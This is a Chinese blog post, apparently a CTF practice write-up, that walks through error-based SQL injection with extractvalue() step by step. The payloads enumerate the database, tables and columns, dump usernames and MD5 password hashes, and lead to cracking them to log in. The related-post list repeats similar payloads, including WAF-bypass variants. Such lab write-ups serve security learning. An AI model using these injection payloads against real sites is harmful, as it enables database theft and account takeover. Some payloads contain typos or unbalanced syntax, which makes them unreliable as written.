刷题笔记:SQL注入漏洞测试(报错盲注)

最新推荐文章于 2023-11-07 15:37:15 发布
最新推荐文章于 2023-11-07 15:37:15 发布
阅读量354 收藏 1
点赞数
分类专栏: web安全刷题 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67399862/article/details/124904203
版权

 

只用and 1=2页面正常,没有报错,但在id=1后加’,会发现页面报错,说明‘与前面的’闭合了

可考虑用报错盲注

运用id=1' and extractvalue(1,concat(0x7e,database()))) --+语句来查询数据库名,即stormgroup

 

运用id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))来查询表名

得到第一个表名member,用同样的方法,得到另一个的表名为notice。

觉得第一个表更像我们要寻找的表,先查第一个表

运用id=1' and extranctvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='member' limit 0,1)))来查询列名

第一个列名为name,按同样的方法可得其他列名分别为password,status

 

利用id=1' and extractvalue(1,concat(0x7e,(select substr(concat(name),1,31) from member)))可查出具体数据name为mozhe

第二个name也为mozhe 

 

利用语句:id=1' and extractvalue(1,concat(0x7e,(select substr(concat(password) from member limit 0,1))))

可得第一个password:3114b433dece9180717f2b7de56b28a3

 

 同样的方法得第二个密码:239bb03ef584c605f7e8edf9a2b8fe882

用MD5进行解密,将得到的密码和用户名拿去登录,得flag

m0_67399862
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(SQL初实践2)SQL报错注入
m0_64417923的博客
05-07 288
使用Extractvalue函数进行报错注入: 首先,Extractvalue函数对于“~”不能识别,“~”的ASCII码对应的是0x7e。 1.查询数据库名称 id=1 and extractv 1 and extractvalue(1,concat(0x7e,(select database()))) alue("anything",concat(0x7e,(select database())))# 得到 数据库名称:sqli 2.查询表名 1 union select 1,e.
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 2665
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错
extractvalue报错注入理论及实战
最新发布
走马
11-07 856
什么是报错注入构造语句,让错误信息中夹杂可以显示数据库内容的查询语句,返回报错提示中包括数据库中的内容如上图所示,通过group by的报错,我们可以知道列数是多少输入正确的查询数据库的SQL语句,虽然可以执行成功,但是页面不显示数据库的名称我们故意将database写为databasa,此时数据库的名称security在报错信息中显示了出来因此可以利用报错的信息得到我们想要的信息。1.通过floor()报错注入2.通过extractvalue()报错注入。
SQL注入报错型注入
noob_3000的博客
08-11 542
SQL注入报错型】CTFHUB学习记录
对于 1=2 防止or注入的理解
Fanor_的博客
09-02 313
对于 1=2 防止or注入的理解
SQL注入绕waf
beaulo的博客
09-15 180
SQL注入绕waf总结笔记0x01 注释绕过0x02 绕过and、or0x03 绕过空格、注释、and、or0x04 绕过空格的方法0x05 绕过引号0x06hex编码绕waf0x07 无法使用infomation_schema的布尔盲注0x08 绕过=、空格、and、or、逗号 0x01 注释绕过 ?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1 0x02 绕过and、or ?id=1'||extractva
Python 刷题笔记:位运算专题一
12-20
在Python编程语言中,位运算符是用于对整数类型(如int)的二进制表示进行操作的特殊运算符。这些运算符直接作用于数字的二进制位,而不是它们的十进制或其它进制值。在深入位运算之前,我们需要先理解计算机中的二...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
java笔试题算法-coding-note:刷题笔记:LeetCode和剑指Offer等
06-03
java笔试题算法 ...刷题笔记:Leetcode和剑指Offer等 语言: C++(为主) Python ​ 项目 LintCode 参考资料 : 含剑指Offer题解、Leetcode题解、算法等内容 : 含算法与数据结构、C++/ JAVA /Python面试经验等
sherpahu#AlgorithmsNotes#刷题笔记:C++基础知识——STL之pair&tuple1
07-25
PAT基础知识——STL之pair&tuple定义用法初始化:使用大括号直接对first,second赋值查询用途替换二元结构体,初始化、获取元素值更方便用于m
leetcode下载-JobFinder:华中科技大学计算机科学与技术学院刷题笔记:hundred_points:以及工作资料:floppy_disk:
06-29
刷题笔记:hundred_points: 以及 工作资料:floppy_disk: 大三下学期第一次参加春招,积累经验为主,拿到offer为辅. 不断学习与提高自己才是最重要滴 因为对于前端、后端技术都是但当涉猎,所以不打算直接投递纯开发岗 做...
sqli-labs第21-28关
永远相信美好的事情即将发生
02-11 1108
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
SQL注入时?id=1 and 1=1和?id=1 and 1=2的功能
热门推荐
m0_51756263的博客
07-09 1万+
SQL注入时进行?id=1 and 1=1和?id=1 and 1=2操作的原因
sql注入——报错注入
qq_52843411的博客
08-23 199
我们经过查询可知,cms下一共有八个表,因为显示行数有限,所以我们只能利用limit函数一行一行的查询,limit 0,1表示显示从第0行开始往下数1行,即回显第0行。我们从中可以看出,对我们有用的为cms_users表,我们接下来就是要知道cms_users表的结构,有哪些可用的内容。报错注入,我们首先要找到页面的报错点,报错注入是利用页面回显的报错信息来显示我们想要查询的信息。1=2时,回显就出错了,我们就要利用这种前后报错回显不同,来进行我们的报错注入。我们将1=1的位置替换为。
sql注入小结
m0_63755076的博客
09-27 408
SQL注入攻击指的是通过构建特殊的输入作为参数传入 Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。是信息数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息比如数据库名,数据库表,表字段的数据类型与访问权限等。的确如此,但这些类型的注入归根结底也是数字型和字符型注入的不同展现形式或者注入的位置不同罢了。:提供了表中的列信心,详细描述了某张表的所有列已经每个列的信息,。
sql注入专辑-2-sql注入1.0
weixin_48776804的博客
02-15 136
sql注入
SQL注入5-6(报错注入)
m0_59082970的博客
03-27 4222
目录 一.判断闭合方式 二.爆库名 三.爆表名 四.爆列名 五.爆字段 一.判断闭合方式 Less-5/?id=1\ 二.爆库名 Less-5/?id=1' and extractvalue(1,concat(0x7e,databse(),0x7e))--+ 三.爆表名 Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from informatio...
sql注入报错注入笔记
Long_gone的博客
12-19 461
报错注入之一 extractvalue 1. 爆库 ?id=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+ 2.爆表 ?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.table...
报错注入extractvalue..之[极客大挑战 2019]HardSQL1
qq_58970968的博客
04-14 171
首先总结知识点: 报错注入模板: extractvalue(0x7e,concat(0x7e,(select database())) updatexml(0x7e,(concat(0x7e,(select database())),0x7e) 这里过滤了空格和等号,当然还有其他的一些字符串; 0."="过滤绕过,用like代替“=” 1.空格绕过 需要用()绕过,就是除了操作字符比如select ,from where like,的库表段名用括号括起来 2.直接在123'extrcatva
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
笔记记录了作者在CTF(Capture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值